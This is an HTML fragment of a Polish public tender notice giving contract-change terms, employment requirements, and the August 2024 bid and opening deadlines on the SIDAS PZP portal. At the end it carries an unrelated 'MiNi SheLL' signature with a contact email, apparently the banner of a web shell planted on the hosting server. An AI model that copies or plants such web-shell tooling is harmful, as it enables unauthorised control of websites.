dopuszcza zmianę postanowień zawartej umowy w drodze udzielenia zamówienia publicznego w przypadkach<br/>określonych w art. 455 Pzp oraz na zasadach określonych w projekcie umowy stanowiącym zał. nr 1 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-08-30 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę poprzez portal SIDAS PZP, któy jest dostepny po zalogowaniu na stronie app.sidaspzp.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-08-30 11:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-09-28</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com